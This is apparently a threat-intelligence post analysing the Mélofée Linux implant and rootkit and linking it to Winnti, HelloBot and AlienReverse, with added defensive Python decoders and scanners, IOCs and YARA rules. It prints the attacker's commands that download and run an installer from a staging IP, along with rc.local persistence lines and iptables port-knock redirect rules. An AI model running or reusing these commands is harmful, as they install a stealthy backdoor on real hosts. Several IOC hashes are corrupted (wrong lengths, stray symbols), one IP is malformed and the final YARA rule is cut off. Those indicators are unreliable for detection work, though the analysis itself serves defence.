Mélofée: a new alien malware in the Panda's toolset targeting Linux hosts


We recently discovered a novel, previously undetected implant family targeting Linux servers, which we dubbed Mélofée.


We linked this malware with high confidence to Chinese state-sponsored APT groups, in particular the notorious Winnti group.


In this blog post we first analyze the capabilities offered by this malware family, which include a kernel-mode rootkit, and then dive into an infrastructure pivot maze to discover related adversary toolsets.


Mélofée implant analysis 


We found three samples of this malware family, which we dubbed Mélofée. 


Two of these samples included a version number (20220111, 20220308), and we assess that the last sample likely dates from late April or May 2022.


All these samples shared a common code base, but showed constant development in the following areas:

* evolutions of the communication protocol and the packet format
* change in the encryption of the configuration, using first RC4 and then a simple XOR
* the development of a SelfForwardServer functionality
* lastly, the inclusion of a kernel-mode rootkit in the last sample.


Rootkit 


The first sample we found dropped a rootkit based on a modified version of the open source project Reptile [1].


According to the vermagic metadata, it is compiled for kernel version 5.10.112-108.499.amzn2.x86_64. The rootkit has a limited set of features, mainly installing hooks designed to hide itself.

The rootkit hooks the functions fillonedir, filldir and filldir64 in order not to display files whose names contain intel_audio or rc.modules when listing a directory.


It also hooks the inet_ioctl function in order to be able to communicate with its userland part using the ioctl system call. The kernel rootkit expects the userland component to send the value 0xe0e0e0e during the ioctl call, with two commands supported (hide and show).


The rootkit is loaded both by the installer and server components with a call to the insmod utility. 


Installer 


The implant and the rootkit were installed using shell commands that download both the installer and a custom binary package from an adversary-controlled server. This behaviour is similar to the installation process of the Winnti Linux rootkits.

    wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer
    wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;
    chmod +x /var/tmp/installer;
    /var/tmp/installer -i /var/tmp/usbd


The installer is also developed in C++ and takes the binary package as an argument. It then proceeds to extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio respectively. The installer inserts the kernel rootkit using a call to system("insmod /etc/intel_audio/intel_audio.ko"), and also installs the persistence in the /etc/rc.modules file.


Writing to this script ensures that both the kernel module and the implant are executed at boot time [2]. The resulting script after installation can be seen below:

    #!/bin/sh

    #Script for starting modules

    /sbin/insmod /etc/intel_audio/intel_audio.ko
    /etc/intel_audio/audio

    #End script


The first bytes of the package hold the offset to the payload (in little endian), which is used to correctly extract the kernel rootkit and the server implant. The first line of the hexdump shows this offset followed by the start of the embedded ELF:

    00000000: b07e 0000 a841 3000 7f45 4c46 0201 0100  .~...A0..ELF....


The developer was also kind enough to include a usage function describing the installer's options (decompiler output; the option letters for "Remove" and "Show help" are illegible in the source and are shown as -?):

    void usage(undefined8 param_1)
    {
        printf("Usage: %s [options]\n", param_1);
        puts("    -?              Remove");
        puts("    -i <data file>  Install");
        puts("    -d              Run in background");
        puts("    -?              Show help");
        return;
    }


Configuration management 


The configuration is encrypted using the RC4 algorithm in the two early samples, and with a simple XOR with a single-byte key (0x43) in the undated sample.


The configuration format changed between the samples: the first one contains all elements in encrypted form, and the last one has only the C&C domain encrypted.


Example of decrypted configuration:

    1:www.data-yuzefuji[.]com:443:5

This configuration contains the following elements:

* The socket type (0x1 being TCP)
* The C&C domain
* The communication port
* The sleep time in minutes between requests
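To make the configuration handling concrete, here is an added example (written for this page, not code from the original post or from the malware's authors) that decrypts and parses a configuration protected with the single-byte XOR described above. The plaintext layout and the 0x43 key are the ones stated in the post; the encrypted blob is constructed, and the brute-force helper goes one step beyond the post by checking every possible single-byte key against the documented layout.

```python
import re

# Layout stated in the post: "<socket type>:<C&C domain>:<port>:<sleep minutes>".
# The sample plaintext is the post's own decrypted example (domain defanged).
PLAINTEXT_CONFIG = b"1:www.data-yuzefuji[.]com:443:5"
XOR_KEY = 0x43  # single-byte key used by the undated sample

# Loose shape check for a decrypted configuration: four colon-separated
# fields, digits in the numeric positions and a domain-like second field.
CONFIG_RE = re.compile(rb"^\d+:[A-Za-z0-9.\[\]-]+:\d{1,5}:\d+$")


def xor_decrypt(blob: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the single-byte XOR (XOR is symmetric, so this also encrypts)."""
    return bytes(b ^ key for b in blob)


def parse_config(plaintext: bytes) -> dict:
    """Split a decrypted configuration into its four documented fields."""
    fields = plaintext.decode("ascii").split(":")
    if len(fields) != 4:
        raise ValueError(f"expected 4 colon-separated fields, got {len(fields)}")
    socket_type, domain, port, sleep_minutes = fields
    return {
        "socket_type": int(socket_type),
        "c2_domain": domain,
        "port": int(port),
        "sleep_minutes": int(sleep_minutes),
    }


def extract_config(encrypted: bytes, key: int = XOR_KEY) -> dict:
    """Decrypt with a known key and parse."""
    return parse_config(xor_decrypt(encrypted, key))


def find_single_byte_xor_config(blob: bytes):
    """Try every single-byte key and return (key, config) for the first
    candidate that decrypts to the documented layout, or None."""
    for key in range(256):
        candidate = xor_decrypt(blob, key)
        if CONFIG_RE.match(candidate):
            return key, parse_config(candidate)
    return None


# Constructed encrypted blob, produced by XORing the sample plaintext with 0x43.
ENCRYPTED_CONFIG = xor_decrypt(PLAINTEXT_CONFIG, XOR_KEY)

if __name__ == "__main__":
    print(extract_config(ENCRYPTED_CONFIG))
    print(find_single_byte_xor_config(ENCRYPTED_CONFIG))
```

The shape check is deliberately loose: it only needs to separate a plausible configuration from the 255 wrong decryptions, so a false positive on a real binary should be confirmed by resolving the recovered domain against the IOC list.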


Persistence mechanisms


The implant has two persistence mechanisms, depending on its running privileges. If it runs as the root user, it tries to write a line containing sh -c IMPLANT_EXECUTABLE_NAME >/dev/null 2>&1 in the files /etc/rc.local or /etc/rc.d/rc.local.

If it runs as an unprivileged user, it will try to install its persistence in the following files:

* /home/CURRENT_USERNAME/.bash_profile
* /home/CURRENT_USERNAME/.bash_login
* /home/CURRENT_USERNAME/.profile

The rootkit installer inserts the persistence for the kernel module in the /etc/rc.modules file.
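As an added example (not code from the original post), here is a small Python scanner that checks the persistence locations named in this section for the artifacts the post describes: the sh -c <implant> >/dev/null 2>&1 line written by the implant and the insmod / intel_audio lines written for the rootkit. The third indicator is a broader heuristic of my own (a module inserted from outside /lib/modules). The sample file contents are constructed for the demonstration; scan_files reads real paths and skips those it cannot open.

```python
import re
from pathlib import Path

# Persistence locations named in the post.
ROOT_PERSISTENCE_FILES = ["/etc/rc.local", "/etc/rc.d/rc.local", "/etc/rc.modules"]
USER_PERSISTENCE_FILES = [".bash_profile", ".bash_login", ".profile"]

# Indicators drawn from the post. The third pattern is a broader heuristic:
# a module inserted from somewhere other than the distribution's module tree.
INDICATOR_PATTERNS = [
    ("melofee_rootkit_path", re.compile(r"/etc/intel_audio/")),
    ("melofee_implant_line", re.compile(r"\bsh -c \S+ >/dev/null 2>&1")),
    ("insmod_outside_lib_modules", re.compile(r"\binsmod\s+(?!/lib/modules/)\S+\.ko\b")),
]


def scan_text(text: str, source: str) -> list:
    """Return (source, line number, indicator name, line) for every line
    matching one of the indicators; at most one hit per line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATOR_PATTERNS:
            if pattern.search(line):
                hits.append((source, lineno, name, line.strip()))
                break
    return hits


def candidate_paths(home_dirs) -> list:
    """System-wide files plus the three profile files of each home directory."""
    paths = list(ROOT_PERSISTENCE_FILES)
    for home in home_dirs:
        paths.extend(str(Path(home) / name) for name in USER_PERSISTENCE_FILES)
    return paths


def scan_files(paths) -> list:
    """Scan the given files on disk; unreadable or missing files are skipped."""
    hits = []
    for path in paths:
        try:
            text = Path(path).read_text(errors="replace")
        except OSError:
            continue
        hits.extend(scan_text(text, path))
    return hits


# Constructed sample contents (not taken from a real host).
SAMPLE_RC_MODULES = (
    "#!/bin/sh\n"
    "#Script for starting modules\n"
    "/sbin/insmod /etc/intel_audio/intel_audio.ko\n"
    "/etc/intel_audio/audio\n"
    "#End script\n"
)
SAMPLE_RC_LOCAL = (
    "#!/bin/sh\n"
    "touch /var/lock/subsys/local\n"
    "sh -c /var/tmp/usbd >/dev/null 2>&1\n"
    "exit 0\n"
)
SAMPLE_PROFILE = "# ~/.profile\nexport PATH=$HOME/bin:$PATH\n"

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_RC_MODULES, "/etc/rc.modules") + scan_text(SAMPLE_RC_LOCAL, "/etc/rc.local"):
        print(hit)
    # On a live host: scan_files(candidate_paths(Path("/home").glob("*")))
```

Because the rootkit hides file names containing intel_audio and rc.modules from directory listings, a hit in /etc/rc.modules read by path is more trustworthy than the absence of the file in an ls output on the same host.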


Supported commands 


The commands supported by the implant evolved between the samples, showing ongoing development of the backdoor.


The first two versions:

Command ID   Capability                  Comment
0x103        ping back                   Sent by the client
0x1          uninstall                   Kill the current process and remove the persistence
0x2          update and relaunch         Overwrite the currently running file and relaunch
0x3          launch new command thread   Creates a new socket for interaction
0x4          write file
0x5          read file
0x6          launch shell
0x7          create socket               0x0: TCP, 0x1: TLS, 0x2: UDP
0x10         send_local_information      Hostname, date, current UID, implant version number, ...
0x50001      list directory
0x50002      create directory
0x50003      not implemented
0x50004      delete directory            Wrapper over system("rm -fr %s")

Last version:

Command ID   Capability                  Comment
0x10005      reset_timer
0x10002      clean_and_exit
0x10004      create_socket               Create a bidirectional socket, probably used for proxying
0x40001      list_directory
0x40002      delete_directory            Wrapper over system("rm -fr %s")
0x40003      rename
0x40004      create_directory
0x40005      write file
0x40006      read file
0x50001      exec command with output
0x70001      write integer to file       Purpose unknown, probably used for sleeptime
0x60001      launch shell
0x90001      no op


Communication protocols 


The communication protocols evolved across the three analyzed samples; however, three socket types are implemented:

* TCPSocket (type 0x0), using raw TCP with a custom packet format described below;
* TLSSocket (type 0x1), using a TLS-encrypted channel to exchange with the C&C server;
* UDPSocket (type 0x2), using the KCP protocol [3] to send data. It should be noted that KCP is a public communication library, and is also used in several malware families such as Amoeba [4] or CrossWalk [5].
* Some leftover code seems to indicate that there could be an additional type 0x3 for HTTP-based communications, but it was not implemented in the analyzed samples.

While the data is not encrypted in any form in two of the samples, in the last one it is encrypted using the RC4 algorithm with a hardcoded key (\x01\x02\x03\x04 repeated 4 times).
The packet formats used by Mélofée are the following.

Packet format of the two early samples (the struct name is only partially legible in the source and is rendered here as Packet2022_early):

    struct Packet2022_early {
        unsigned int dwCommand;
        unsigned int dwCommandResult;
        unsigned int dwUnknown;
        unsigned int dwDataSize;
        char[] clear_text_data;
    };

Packet format of the last sample:

    struct Packet202205 {
        unsigned int dwUnknown;
        unsigned int dwRandom1;
        unsigned int dwRandom2;
        unsigned int dwCommandResult;
        unsigned int dwCommandID;
        unsigned int dwCommandSize;
        char[] encrypted_data;
    };
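An added example (not code from the original post or from the implant) that decodes Packet202205 frames, for instance from a captured TCP stream, using the RC4 key the post gives (\x01\x02\x03\x04 repeated four times). Two points are assumptions of mine: the header fields are read as little-endian uint32 values (the target is x86_64) and dwCommandSize is taken as the length of the encrypted data that follows the 24-byte header. build_packet exists only to produce a constructed test frame with the same layout.

```python
import struct

RC4_KEY = bytes([0x01, 0x02, 0x03, 0x04]) * 4   # key stated in the post
HEADER = struct.Struct("<6I")                  # assumption: little-endian uint32 fields
HEADER_FIELDS = ("unknown", "random1", "random2", "command_result", "command_id", "command_size")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_packet(raw: bytes) -> tuple:
    """Parse one Packet202205 frame from the start of `raw`.
    Returns (fields, bytes consumed); fields["data"] is the decrypted payload."""
    if len(raw) < HEADER.size:
        raise ValueError("frame shorter than the 24-byte header")
    fields = dict(zip(HEADER_FIELDS, HEADER.unpack_from(raw)))
    end = HEADER.size + fields["command_size"]   # assumption: size counts the encrypted data
    if len(raw) < end:
        raise ValueError("truncated frame: header announces more data than present")
    fields["data"] = rc4(RC4_KEY, raw[HEADER.size:end])
    return fields, end


def iter_packets(stream: bytes):
    """Split a captured byte stream into consecutive frames."""
    offset = 0
    while offset < len(stream):
        fields, used = parse_packet(stream[offset:])
        yield fields
        offset += used


def build_packet(command_id: int, data: bytes, command_result: int = 0,
                 unknown: int = 0, random1: int = 0x11111111, random2: int = 0x22222222) -> bytes:
    """Construct a frame with the same layout; used here only to build test input."""
    encrypted = rc4(RC4_KEY, data)
    return HEADER.pack(unknown, random1, random2, command_result, command_id, len(encrypted)) + encrypted


# Constructed capture: a list_directory request followed by a no-op (IDs from the post's table).
SAMPLE_STREAM = build_packet(0x40001, b"/var/tmp") + build_packet(0x90001, b"")

if __name__ == "__main__":
    for frame in iter_packets(SAMPLE_STREAM):
        print(hex(frame["command_id"]), frame["data"])
```

Since RC4 is a stream cipher with a fixed key and no per-packet nonce, identical plaintexts produce identical ciphertexts at the same offset; the dwRandom1/dwRandom2 header fields are in the clear, so they do not change that, which makes encrypted command bodies a usable signature base for network detection.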


SelfForwardServer and listening server

In the latest sample, a new functionality was implemented, named SelfForwardServer.

Depending on a configuration flag, the implant can install iptables rules to redirect TCP network traffic from port 57590.

The steps to install these rules are the following:

* First, a new NAT chain named XFILTER is created using the following command: iptables -t nat -N %s
* A redirection rule is added for the port in this NAT chain: iptables -t nat -A %s -p tcp -j REDIRECT --to-port %d
* The recent connections from port 45535 are saved under the name ipxles: iptables -t nat -A PREROUTING -p tcp --sport 45535 -m recent --set --name %s --rsource -j ACCEPT
* Recent ipxles connections are redirected to the NAT chain: iptables -t nat -A PREROUTING -p tcp --dport %d --syn -m recent --rcheck --seconds 300 --name %s --rsource -j %s
* Finally, the host is instructed to accept network traffic on port 57590 using the command iptables -I INPUT -p tcp --dport %d -j ACCEPT
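To turn the rule sequence above into something a defender can check, here is an added example (not code from the post) that reads iptables-save style output and flags the pattern the post describes: a -m recent --set entry keyed on a source port, an --rcheck rule that jumps into a user chain holding a REDIRECT, and the matching INPUT ACCEPT. The sample output is constructed; the chain name XFILTER, the recent list name ipxles and the ports 45535/57590 come from the post, while the REDIRECT target port (22) is a placeholder because the post does not state it.

```python
import re

# Constructed iptables-save output mixing ordinary rules with the sequence from the post.
SAMPLE_IPTABLES_SAVE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:XFILTER - [0:0]
-A PREROUTING -p tcp -m tcp --sport 45535 -m recent --set --name ipxles --rsource -j ACCEPT
-A PREROUTING -p tcp -m tcp --dport 57590 --syn -m recent --rcheck --seconds 300 --name ipxles --rsource -j XFILTER
-A XFILTER -p tcp -j REDIRECT --to-ports 22
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 57590 -j ACCEPT
COMMIT
"""


def parse_rules(text: str) -> list:
    """Return (table, rule) pairs for every '-A' line, tracking the current '*table'."""
    table, rules = None, []
    for line in text.splitlines():
        if line.startswith("*"):
            table = line[1:].strip()
        elif line.startswith("-A "):
            rules.append((table, line.strip()))
    return rules


def _opt(rule: str, name: str):
    """Value following an option such as '--name' or '-j', or None."""
    m = re.search(rf"{name} (\S+)", rule)
    return m.group(1) if m else None


def find_port_knock_redirects(text: str) -> list:
    """Find nat rules where a source-port 'knock' remembered with -m recent later
    unlocks a jump into a chain that REDIRECTs traffic, as in the post."""
    rules = parse_rules(text)

    # 1. remembered source ports: recent-list name -> knocking source port
    knock_sports = {}
    for table, rule in rules:
        if table == "nat" and "-m recent" in rule and "--set" in rule:
            name, sport = _opt(rule, "--name"), _opt(rule, "--sport")
            if name and sport:
                knock_sports[name] = int(sport)

    # 2. chains that contain a REDIRECT rule: chain -> destination port
    redirect_chains = {}
    for table, rule in rules:
        if table == "nat" and "-j REDIRECT" in rule:
            chain = rule.split()[1]
            to = re.search(r"--to-ports? (\d+)", rule)
            redirect_chains[chain] = int(to.group(1)) if to else None

    # 3. --rcheck rules that tie a remembered name to such a chain
    findings = []
    for table, rule in rules:
        if table != "nat" or "--rcheck" not in rule:
            continue
        name, dport, target = _opt(rule, "--name"), _opt(rule, "--dport"), _opt(rule, "-j")
        if name in knock_sports and target in redirect_chains and dport:
            findings.append({
                "recent_name": name,
                "knock_sport": knock_sports[name],
                "dport": int(dport),
                "chain": target,
                "redirect_to": redirect_chains[target],
                "input_accept": any(
                    t == "filter" and r.startswith("-A INPUT ")
                    and f"--dport {dport}" in r and r.endswith("-j ACCEPT")
                    for t, r in rules
                ),
            })
    return findings


if __name__ == "__main__":
    for finding in find_port_knock_redirects(SAMPLE_IPTABLES_SAVE):
        print(finding)
```

Feed it the output of iptables-save (or iptables-legacy-save on hosts where the implant's iptables binary uses the legacy backend); legitimate port-knocking setups also use -m recent, so the REDIRECT into a freshly created chain is the discriminating part.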


It should be noted that while the SelfForwardServer was deactivated in the configuration, the sample embedded both a self-signed certificate generated on 2021-06-03 and the corresponding private key, to be used for securing communication in server mode.


Some of the underlying code is also present in the two earlier samples (as documented by leftover RTTI information), and three types of server were available:

* TCPServer (type 0x0)
* TLSServer (type 0x1)
* UDPServer (type 0x2)


One interesting tidbit of this code is hidden in the receive function of the TLSServer (at address 0x42957a in the undated sample). When the first 4 bytes received by this function through the recv library call are 03 01 d3 76, a flag affecting the creation of the subsequent socket is set. However, we could not identify precisely the purpose of this magic value.


Because of the presence of unused code and the evolutions between the samples, we assess that the Server and SelfForwardServer are still under development by the attackers.


Another pokemon inside the attacker's toolset 


We analyzed the infrastructure used by the attacker by pivoting on both public and private datasets. We assess that this malware family is probably linked to the Amoeba and Winnti state-sponsored threat groups.

The infrastructure of the Mélofée implants is linked to the following tools:

* Some of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C&C servers;
* Other servers were linked to both Winnti and HelloBot tools;
* We also saw related domains used as C&C servers for tools like PlugX, Spark [9], Cobalt Strike, StowAway [10] and the legitimate toDesk remote control tool;
* Lastly, the attacker also probably used the ezXSS [11] tool, but we could not confirm why.

Hellobot 


HelloBot is a malware family also targeting Linux hosts and is known to be used by APT groups such as Earth Berberoka [6]. While pivoting on the Mélofée infrastructure, we found an IP in common with a HelloBot sample, which provided another point to dig into.

We found several samples of this malware and developed a custom configuration extraction script (provided in the annexes of this blog post).

Using the extracted configurations, we were also able to find strong infrastructure links between HelloBot and Winnti: for example, both used subdomains of gitlab[.]com and cloudflare[.]com as C&C servers.


Probable links with Winnti 


The response issued by the C&C server at the IP address 173.209.62[.]186 on port 443 could be uniquely linked to another domain, dev[.]yuanta[.]dev. This server was known to be used to stage archives containing an installer for the Linux version of the Winnti rootkit [7].

We also downloaded several samples of this malware family, extracted the configuration (using the script provided by Chronicle), and found several domains in common between HelloBot and Winnti, such as cloudflare[.]com and gitlab[.]com.

Analysis graph 


Using the previous data points, we generated an infrastructure graph to draw the relations between the samples.

We assess with high confidence that HelloBot, Winnti and Mélofée are all related and were used by Chinese state-sponsored attacker groups during at least all of 2022.


Alien

During our analysis, we discovered another Linux implant dubbed AlienReverse. This code was architected in a similar manner to Mélofée; however, there are several crucial differences:

* The data of the communication protocol was encrypted using pel_decrypt and pel_encrypt from the Reptile project [1].
* The command IDs were different, as can be seen below.
* The tool included several other public tools, such as EarthWorm [12] and socks_proxy [13].

There were however some common points between Mélofée and AlienReverse:

* Both implants were developed in C++.
* Both implants used a file with a fixed ID in /var/tmp/%s.lock to ensure only one implant is running (this code was found in public [14], but seems rarely used in the wild).
* This implant implemented a similar mechanism for limiting working hours (defined as worktime).

The commands supported by this implant were the following:


Command ID   Capability          Comment
0x110010     CmdBroadcast        Send encrypted data over the socket
0x110011     CmdOnRainUninstall  Unimplemented
(illegible)  (illegible)         Send local information such as hostname, date, and current UID to the server
(illegible)  (illegible)         Supports several subcommands such as openFile, CreateDir, FileEnum, FileDownload, ...
0x110062     ScreenSnapshot      Unimplemented
0x110063     CmdOnTaskList       Unimplemented
0x110064     CmdOnShellCommand   Launch interactive shell
0x110065     CmdOnShellactive    Unimplemented
0x110066     CmdOnServiceList    Unimplemented
0x110068     CmdOnPortMapping    Launches EarthWorm to perform the port mapping, supporting a scanning mode with another AlienReverse implant used as a proxy. Also implements the management of a SOCKS proxy
0x110073     CmdOnKbdRecord      Unimplemented
0x110075     CmdOnWorkTime       Writes the expected runtime hours in the file /tmp/worktime


The packet format used by the communication protocol is very similar to the one used by Mélofée:

    struct AlienComzPacket {
        unsigned int dwTickCount;
        unsigned int dwMagic1;          // 0xa003001
        unsigned int dwMagic2;          // 0x10000137, also used to indicate if the packet has data
        unsigned int dwCommandID;
        unsigned int dwTotalSize;
        unsigned int dwEncryptedSize;
        unsigned int ;                  // field name missing in the source
        char[] data;                    // The data encrypted using pel_encrypt
    };


While we initially thought that this sample was related to the Mélofée family, we came to the conclusion that it is a 
distinct tool. However, we decided to include it in this report because it was used as a starting point in this 
investigation, and we think that sharing it to the public is important. 


We also could not link it to known adversary groups, but we assess that it is likely used in targeted attacks.


Conclusion


The Mélofée implant family is another tool in the arsenal of Chinese state-sponsored attackers, who show constant innovation and development.

The capabilities offered by Mélofée are relatively simple, but may enable adversaries to conduct their attacks under the radar. These implants were not widely seen, showing that the attackers are likely limiting their usage to high-value targets.


Annexes

IOCs

Hashes

SHA256 | FileType | Comment
3ca39774a4405537674673221940e306cf5e8cd8dfa1f5fc626869738a489c3d | Text file | Installation commands
75850934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0 | ELF x64 executable | Installer
a5a4284f87fd47559474626040d289ffabba1066fae6c37bd7de9dabaf65e87a | ELF x64 executable | Implant version 20220111
2db4adf44b446cdd1989cbc139e67c068716fb76a4606547916eef7a959627009 | ELF x64 executable | Implant version 20220308
8d855c28744dd6a9c0668ad9659baf06e5e448353f54d2f99beddd21b41390Db7 | ELF x64 executable | Implant with rootkit and without version number
f3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68 | Binary file | Container of rootkit and implant probably used for installation
330a61fa666001be55db9e6f286e29cce4aff7f79c6ae267975c19605a2146a21 | PE x64 executable | Cobalt Strike beacon
7149cdb130e1a52862168856eae01791cc3d49632287f990d90da0cce1dc7c6b9 | PE32 executable | Cobalt Strike beacon
a62b67596640a3ebadd288e733f933ff581cc182246871351482bd7472655bb5 | ELF x64 executable | StowAway proxy tool
3535ff45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88 | ELF x64 executable | AlienReverse implant
2€62d6c47c00458da9338c990b095594eceb3994bf96812c329f8326041208e8 | ELF x32 executable | HelloBot implant
407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200f0462b8 | ELF x32 executable | HelloBot implant
187b6a4c6bc379c183657d8eafc225da53ab8f78ac192704b713cc202cf89a17 | ELF x32 executable | HelloBot implant
2801a3cc5aed8ecb391a9638a3c6f8db58ca3002e66ff11bf88f8c7c2e5a6b009 | ELF x32 executable | HelloBot implant
6e858c2c9ae20e3149cb0012ab9a24995aa331d2a818b127b2f517bc3aa745a0 | PE x64 executable | Go downloader for toDesk
7684e1dfaeb2e7c8fd1c9bd65041070550c92a87d9e11e327309ff6c21b5e7ad97 | PE x64 executable | Go downloader for toDesk
899eff7681982941b233e1ea3c1a6d5a4e90153bbb2809f70ee5f6fcece06cabc | PE x64 executable | Spark implant
©36ab5108491f4969512f4d35e0d42b3d371033c8ccf03e700c60fb98d5a95f8 | ELF x64 UPX packed executable | probably NPS, to confirm
ad5bc6c4e653f88c451f6f6375516cc36a8fa03dd5a4d1412a418c91d4f9bec8 | ASCII text file | Script dropped in /etc/rc.modules for rootkit persistence
1f9e4bfb25622eab6c33da7da9be6c51cf8bf1a284ee1c1703a3cee445bc8cd9 | ELF x64 executable | Winnti Linux
22fd67457274635db7dd679782e002009363010db66523973b4748d5778b1a2a | ELF x64 executable | Winnti Linux
3c1842d29a3445bd3b85be486e49dba36b8b5ad55841c0ce00630cb83386881d | ELF x64 executable | Winnti Linux
5861584bb7fa46373c1b1f83b1e066a3482e9c10ce87539ee1633ef0f567e743 | ELF x64 executable | Winnti Linux rootkit
378acfdbcec039cfe7287faac184adf6ad525b201cf781db90820784c9c75c99 | Shell script | Winnti Linux rootkit installer
617f9add4c27f3bb91a32fee007cce01ff5a51deaf42e75e6cec3e71afe2ba967 | ELF x64 executable | Winnti Linux
69ff2f88c1f90075680d591e9655cc61eaa4709ccd8b3aa6ec15e3aa46b9098bd | ELF x64 executable | Winnti Linux
ad979716afbce85776251d51716aeb00665118f0350038d150c129256dd6fc5f | ELF x64 executable | Winnti Linux
f49f1b2cc52623624fdd3d636056b8a80705f6456a3d5a676e3fb78749bdd281 | ELF x64 executable | Winnti Linux
2c1a6fe08c8cbdc904809be4c120520888da7f331234d1656a268780a9be45e20 | ELF x64 executable | Winnti Linux rootkit (Azazel fork)
a37661830859ca440d777af0bfa829b018276bb1ff81fe14D1485fa3c09f5f286 | JavaScript file | ezXSS payload


Filenames

* /etc/intel_audio
* /etc/intel_audio/id
* /etc/intel_audio/intel_audio.ko


Network IOCs

IOC | Comment
dgbyem[.]com | AlienReverse C&C domain
update[.]ankining[.]com | Mélofée C&C subdomain
www[.]data-yuzefuji[.]com | Mélofée C&C domain
ssm[.]awszonwork[.]com | Mélofée C&C subdomain
stock[.]awszonwork[.]com | CobaltStrike C&C subdomain
help[.]gitlab[.]com | HelloBot C&C subdomain
about[.]gitlab[.]com | StowAway and Winnti C&C subdomain
www[.]gitlab[.]com | Unknown usage
cloudflare[.]com | CobaltStrike C&C domain, PlugX staging
cdn[.]cloudflare[.]com | HelloBot C&C subdomain
cdn2[.]cloudflare[.]com | C&C subdomain
cdn3[.]cloudflare[.]com | C&C subdomain
cdn4[.]cloudflare[.]com | C&C subdomain
dns[.]cloudflare[.]com | PlugX and Winnti C&C subdomain
dns2[.]cloudflare[.]com | Spark C&C subdomain, toDesk staging
dev[.]yuanta[.]dev | Probable Winnti C&C domain
test[.]yuanta[.]dev | Probable Winnti C&C domain
(domain illegible in the source) | Winnti C&C domain
vt[.]livehost[.]live | Winnti C&C domain
56.67.208[.]192 | Mélofée C&C IP
5.61.57[.]80 | Mélofée C&C IP
47.139.28[.]254 | AlienReverse C&C IP
173.209.62[.]186 | Mélofée installer staging
173.209.62[.]187 | C&C server
173.209.62[.]188 | Mélofée C&C server and Winnti staging domain
173.209.62[.]189 | C&C server
173.209.62[.]190 | Mélofée C&C IP
(IP illegible in the source) | CobaltStrike, ShadowPad and HelloBot C&C IP
47.243.51[.]98 | StowAway C&C IP
85.145.128[.]90 | CobaltStrike and PlugX C&C IP
03.87.10[.]100 | toDesk staging
202.182.101[.]174 | PlugX C&C IP
44.202.112[.]187 | PlugX staging
38.54.30[.]139 | Winnti C&C IP
Yara rules

rule UNK_APT_MelofeeImplant {
    meta:
        author = "Exatrack"
        date = "2023-03-03"
        update = "2023-03-03"
        description = "Detects the Melofee implant"
        // one further meta field is illegible in the source
        sample_hash = "a5a4284f87fd47559474626040d289ffabba1066fae6c37bd7de9dabaf65e87a, f3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68"

    strings:
        $str_melofee_implant_01 = "10PipeSocket"
        $str_melofee_implant_02 = "ikcp_ack_push"
        $str_melofee_implant_03 = "TLSSocketEE"
        $str_melofee_implant_04 = "/tmp/%s.lock"
        $str_melofee_implant_05 = "neosmart::WaitForMultipleEvents"
        $str_melofee_implant_06 = "9TLSSocket"
        $str_melofee_implant_07 = "7VServer"
        $str_melofee_implant_08 = "N5boost6detail13sp_ms_deleterI13UdpSocketWrapEE"
        $str_melofee_implant_09 = "UdpServerWrap"
        $str_melofee_implant_10 = "KcpUpdater"
        $str_melofee_implant_11 = "SelfForwardServer"

        $str_command_parsing_01 = { 3? 04 00 05 00 ?? ?? ?? ?? 00 00 3? 01 00 05 00 ?? ?? 3? 05 00 04 00 }
        $str_command_parsing_02 = { 3? 04 00 04 00 ?? ?? ?? ?? 00 00 3? 04 00 04 00 ?? ?? 3? 05 00 01 00 }
        // the tail of the third pattern is illegible in the source; only the legible prefix is kept
        $str_command_parsing_03 = { 3? 01 00 07 00 ?? ?? ?? ?? 00 00 3? 01 00 09 00 }

    condition:
        3 of them
}

rule UNK_APT_MelofeeInstaller {
    meta:
        author = "Exatrack"
        // date and update fields are illegible in the source
        description = "Detects the installer for melofee malware"
        score = 80
        tlp = "AMBER"
        source = "Exatrack"
        sample_hash = "75850934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0"

    strings:
        $str_melofee_installer_01 = "#Script for starting modules"
        // $str_melofee_installer_02 and _03 are illegible in the source
        $str_melofee_installer_04 = "rm -fr /etc/rc.modules"
        // $str_melofee_installer_05 is illegible in the source (it ends with "Install")
        $str_melofee_installer_06 = "create home folder failed"
        // $str_melofee_installer_07 to _09 are illegible in the source
        $str_melofee_installer_10 = "Unkown option %c\n"

    condition:
        any of them
}

rule UNK_APT_AlienImplant {
    meta:
        author = "Exatrack"
        // date and update fields are illegible in the source
        description = "Detects an unknown implant from AlienManager family, related to melofee"
        tlp = "CLEAR"
        sample_hash = "3535f45bbfafda863665c41d974894c39277dfd9af1079581828015f76669588"

    strings:
        $str_alien_01 = "[+] Connect Sa Successed,Start Transfer..."
        $str_alien_02 = "Alloc buffer to decrypt data error, length == %d."
        $str_alien_03 = "pel decrypt msg data error, error"
        $str_alien_04 = "encrypt data error, length == %d."
        $str_alien_05 = "DoRecvOverlapInternal error!"
        $str_alien_06 = "Socks Listen port is %d,Username is %s, password is %s"
        $str_alien_07 = "Start port mapping error! remoteAddr=%s remotePort=%d localAddr=%s localPort=%d"
        $str_alien_08 = "OnCmdSocksStart error!"
